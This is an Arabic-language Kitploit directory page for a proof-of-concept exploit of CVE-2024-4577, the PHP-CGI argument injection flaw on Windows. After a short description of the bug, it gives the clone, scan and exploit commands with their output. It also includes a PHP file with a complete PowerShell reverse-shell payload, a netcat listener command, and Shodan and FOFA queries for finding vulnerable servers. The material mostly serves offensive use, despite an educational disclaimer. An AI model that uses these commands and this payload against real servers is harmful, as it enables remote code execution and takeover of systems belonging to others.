Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577 — إثبات مفهوم لثغرة حقن وسائط CGI في PHP (CVE-2024-4577) تتيح تنفيذ التعليمات البرمجية عن بُعد على خوادم ويندوز الضعيفة مع إمكانيات المسح والحصول على شل عكسي. | Kitploit
أدوات/GitHubGitHub/phirojshah/cve-2024-4577
الاستطلاعتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubphirojshah/cve-2024-4577

CVE-2024-4577

إثبات مفهوم لثغرة حقن وسائط CGI في PHP (CVE-2024-4577) تتيح تنفيذ التعليمات البرمجية عن بُعد على خوادم ويندوز الضعيفة مع إمكانيات المسح والحصول على شل عكسي.

عرض المستودع
214منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حقن وسائط PHP CGI (CVE-2024-4577) تنفيذ الأوامر عن بُعد

📜 الوصف

في إصدارات PHP 8.1.* قبل 8.1.29، و8.2.* قبل 8.2.20، و8.3.* قبل 8.3.8، عند استخدام Apache وPHP-CGI على ويندوز، إذا كان النظام مهيئًا لاستخدام صفحات رموز معينة، فقد يستخدم ويندوز سلوك "Best-Fit" لاستبدال الأحرف في سطر الأوامر المُعطى لوظائف Win32 API. قد تُساء وحدة PHP CGI تفسير هذه الأحرف كخيارات PHP، مما قد يسمح لمستخدم ضار بتمرير خيارات إلى ملف PHP الثنائي الجاري تشغيله، وبالتالي الكشف عن كود المصدر للنصوص البرمجية، وتنفيذ كود PHP تعسفي على الخادم، إلخ.

"XAMPP عرضة للخطر في التكوين الافتراضي، ويمكننا استهداف نقطة النهاية /php-cgi/php-cgi.exe. لاستهداف نقطة نهاية .php (على سبيل المثال /index.php)، يجب تكوين الخادم لتشغيل نصوص PHP في وضع CGI."

🛠️ التثبيت

root@kitploit:~
$ git clone https://github.com/fa-rrel/CVE-2024-4577-RCE/
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt 

⚙️ الاستخدام

$ python3 CVE-2024-4577.py -s -t https://target.com/

🤖 إنشاء شل عكسية

حمولة PHP

[!NOTE] توضح هذه الأداة تقنيات وتكتيكات وإجراءات هجومية واقعية (TTPs). ومع ذلك، فإن نموذج الحمولة هذا لا يعمل في هذا السيناريو. قم بتعديل shell.php للحصول على حمولة عملية كاملة.

root@kitploit:~
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>
 

🖥️ فحص الخادم

root@kitploit:~
$ python3 CVE-2024-4577.py -s -t https://target.com/                                                   
  ______     _______   ____   ___ ____  _  _         _  _  ____ _____ _____ 
 / ___\ \   / / ____| |___ \ / _ \___ \| || |       | || || ___|___  |___  |
| |    \ \ / /|  _|     __) | | | |__) | || |_ _____| || ||___ \  / /   / / 
| |___  \ V / | |___   / __/| |_| / __/|__   _|_____|__   _|__) |/ /   / /  
 \____|  \_/  |_____| |_____|\___/_____|  |_|          |_||____//_/   /_/    
المؤلف: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | إثبات المفهوم والفحص  

[+] الهدف https://target.com قابل للاستغلال لثغرة CVE-2024-4577

🎯 استغلال الخادم الضعيف

root@kitploit:~
$ python3 CVE-2024-4577.py -t {targetsite.txt} -e -p rev_shell.php
                                                  
 ______     _______   ____   ___ ____  _  _         _  _  ____ _____ _____ 
 / ___\ \   / / ____| |___ \ / _ \___ \| || |       | || || ___|___  |___  |
| |    \ \ / /|  _|     __) | | | |__) | || |_ _____| || ||___ \  / /   / / 
| |___  \ V / | |___   / __/| |_| / __/|__   _|_____|__   _|__) |/ /   / /  
 \____|  \_/  |_____| |_____|\___/_____|  |_|          |_||____//_/   /_/    
المؤلف: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | إثبات المفهوم والفحص  

[+] تم الاستغلال بنجاح!

👨🏻‍💻 مستمع Netcat

root@kitploit:~
$ nc -lvnp 9001

🔍 اكتشاف المضيف الضعيف

  • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
  • FOFA: protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"

💁 المراجع

  • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
  • https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
  • http://www.openwall.com/lists/oss-security/2024/06/07/1
  • https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
  • https://www.php.net/ChangeLog-8.php#8.1.29
  • https://www.php.net/ChangeLog-8.php#8.2.20
  • https://www.php.net/ChangeLog-8.php#8.3.8
  • https://github.com/l0n3m4n/CVE-2024-4577-RCE/

⚠️ إخلاء المسؤولية

تم توفير هذه الأداة لأغراض تعليمية وبحثية فقط. لا يتحمل المنشئ أي مسؤولية عن أي سوء استخدام أو ضرر ناتج عن الأداة.

تنزيل الأداة